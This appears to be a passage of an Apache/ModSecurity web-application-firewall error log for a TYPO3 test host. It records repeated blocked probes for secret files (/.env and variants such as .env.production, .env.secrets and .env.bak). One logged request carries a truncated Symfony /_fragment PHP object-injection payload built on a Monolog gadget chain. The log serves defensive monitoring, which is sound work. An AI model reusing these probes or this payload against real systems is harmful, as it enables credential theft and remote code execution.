[Tue Dec 02 13:18:53.326285 2025] [:error] [pid 464251] [client 45.139.104.171:51636] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS7ZLVeGvt2ZFTja4GwJigAAAAI"]
[Wed Dec 03 06:45:40.339189 2025] [:error] [pid 486473] [client 23.166.88.142:50672] [client 23.166.88.142] ModSecurity: Warning. Found 30 byte(s) in ARGS:_path outside range: 1-255. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "482"] [id "920270"] [msg "Invalid character in request (null character)"] [data "ARGS:_path=_controller=Symfony\\x5cComponent\\x5cYaml\\x5cInline::parse&value=!!php/object:a:1:{i:1;a:2:{i:0;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;N;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:2:\\x22-1\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "surf.test.indacotrentino.com"] [uri "/_fragment"] [unique_id "aS_OhAStvmwQz1jAeZu4TQAAAAY"]
[Fri Dec 05 08:47:48.709043 2025] [:error] [pid 531700] [client 195.178.110.155:56978] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTKOJPjYAO6Jy5EVgXUuhwAAAIM"]
[Fri Dec 05 08:47:48.713943 2025] [:error] [pid 531700] [client 195.178.110.155:56978] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTKOJPjYAO6Jy5EVgXUuhwAAAIM"]
[Fri Dec 05 08:47:48.714317 2025] [:error] [pid 531700] [client 195.178.110.155:56978] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTKOJPjYAO6Jy5EVgXUuhwAAAIM"]
[Fri Dec 05 08:47:54.545816 2025] [:error] [pid 531697] [client 195.178.110.155:56996] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTKOKuqgQSN2J6Cu49vRLAAAAIA"]
[Fri Dec 05 08:47:54.546053 2025] [:error] [pid 531697] [client 195.178.110.155:56996] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTKOKuqgQSN2J6Cu49vRLAAAAIA"]
[Fri Dec 05 08:47:54.546266 2025] [:error] [pid 531697] [client 195.178.110.155:56996] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTKOKuqgQSN2J6Cu49vRLAAAAIA"]
[Fri Dec 05 08:48:00.414860 2025] [:error] [pid 532218] [client 195.178.110.155:39168] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTKOMBxEmzMMD18wwRgEiQAAAAI"]
[Fri Dec 05 08:48:00.415980 2025] [:error] [pid 532218] [client 195.178.110.155:39168] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTKOMBxEmzMMD18wwRgEiQAAAAI"]
[Fri Dec 05 08:48:00.416318 2025] [:error] [pid 532218] [client 195.178.110.155:39168] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTKOMBxEmzMMD18wwRgEiQAAAAI"]
[Fri Dec 05 08:48:06.680598 2025] [:error] [pid 531696] [client 195.178.110.155:57094] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTKONnjGt1q64mrfR9wdSAAAAH8"]
[Fri Dec 05 08:48:06.680835 2025] [:error] [pid 531696] [client 195.178.110.155:57094] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTKONnjGt1q64mrfR9wdSAAAAH8"]
[Fri Dec 05 08:48:06.681013 2025] [:error] [pid 531696] [client 195.178.110.155:57094] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTKONnjGt1q64mrfR9wdSAAAAH8"]
[Fri Dec 05 08:48:10.713715 2025] [:error] [pid 532226] [client 195.178.110.155:57126] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTKOOu0tnvJIONeyH4oeMQAAAAE"]
[Fri Dec 05 08:48:10.713961 2025] [:error] [pid 532226] [client 195.178.110.155:57126] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTKOOu0tnvJIONeyH4oeMQAAAAE"]
[Fri Dec 05 08:48:10.714247 2025] [:error] [pid 532226] [client 195.178.110.155:57126] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTKOOu0tnvJIONeyH4oeMQAAAAE"]
[Fri Dec 05 08:48:10.781499 2025] [:error] [pid 532226] [client 195.178.110.155:57126] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aTKOOu0tnvJIONeyH4oeMgAAAAE"]
[Fri Dec 05 08:48:10.781745 2025] [:error] [pid 532226] [client 195.178.110.155:57126] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aTKOOu0tnvJIONeyH4oeMgAAAAE"]
[Fri Dec 05 08:48:10.781949 2025] [:error] [pid 532226] [client 195.178.110.155:57126] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aTKOOu0tnvJIONeyH4oeMgAAAAE"]
[Fri Dec 05 08:48:10.804270 2025] [:error] [pid 532226] [client 195.178.110.155:57126] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aTKOOu0tnvJIONeyH4oeMwAAAAE"]
[Fri Dec 05 08:48:10.804506 2025] [:error] [pid 532226] [client 195.178.110.155:57126] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aTKOOu0tnvJIONeyH4oeMwAAAAE"]
[Fri Dec 05 08:48:10.804715 2025] [:error] [pid 532226] [client 195.178.110.155:57126] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aTKOOu0tnvJIONeyH4oeMwAAAAE"]
[Fri Dec 05 08:48:10.873442 2025] [:error] [pid 531699] [client 195.178.110.155:57138] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTKOOnSwUDhtP0GmSVpyvAAAAII"]
[Fri Dec 05 08:48:10.873697 2025] [:error] [pid 531699] [client 195.178.110.155:57138] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTKOOnSwUDhtP0GmSVpyvAAAAII"]
[Fri Dec 05 08:48:10.873907 2025] [:error] [pid 531699] [client 195.178.110.155:57138] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTKOOnSwUDhtP0GmSVpyvAAAAII"]
[Fri Dec 05 08:48:11.023833 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aTKOOz6l5AnsUvdIyDeccgAAAAM"]
[Fri Dec 05 08:48:11.024083 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aTKOOz6l5AnsUvdIyDeccgAAAAM"]
[Fri Dec 05 08:48:11.024282 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aTKOOz6l5AnsUvdIyDeccgAAAAM"]
[Fri Dec 05 08:48:11.051037 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.secret"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.secret"] [unique_id "aTKOOz6l5AnsUvdIyDeccwAAAAM"]
[Fri Dec 05 08:48:11.051352 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.secret"] [unique_id "aTKOOz6l5AnsUvdIyDeccwAAAAM"]
[Fri Dec 05 08:48:11.051613 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.secret"] [unique_id "aTKOOz6l5AnsUvdIyDeccwAAAAM"]
[Fri Dec 05 08:48:11.078880 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.secrets"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.secrets"] [unique_id "aTKOOz6l5AnsUvdIyDecdAAAAAM"]
[Fri Dec 05 08:48:11.079176 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.secrets"] [unique_id "aTKOOz6l5AnsUvdIyDecdAAAAAM"]
[Fri Dec 05 08:48:11.079445 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.secrets"] [unique_id "aTKOOz6l5AnsUvdIyDecdAAAAAM"]
[Fri Dec 05 08:48:11.103929 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.private"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.private"] [unique_id "aTKOOz6l5AnsUvdIyDecdQAAAAM"]
[Fri Dec 05 08:48:11.104168 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.private"] [unique_id "aTKOOz6l5AnsUvdIyDecdQAAAAM"]
[Fri Dec 05 08:48:11.104389 2025] [:error] [pid 532219] [client 195.178.110.155:57146] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.private"] [unique_id "aTKOOz6l5AnsUvdIyDecdQAAAAM"]
[Fri Dec 05 08:48:13.803875 2025] [authz_core:error] [pid 532216] [client 195.178.110.155:57156] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Dec 05 08:48:19.653179 2025] [authz_core:error] [pid 531669] [client 195.178.110.155:37930] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Dec 05 08:48:19.675412 2025] [:error] [pid 531669] [client 195.178.110.155:37930] [client 195.178.110.155] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] 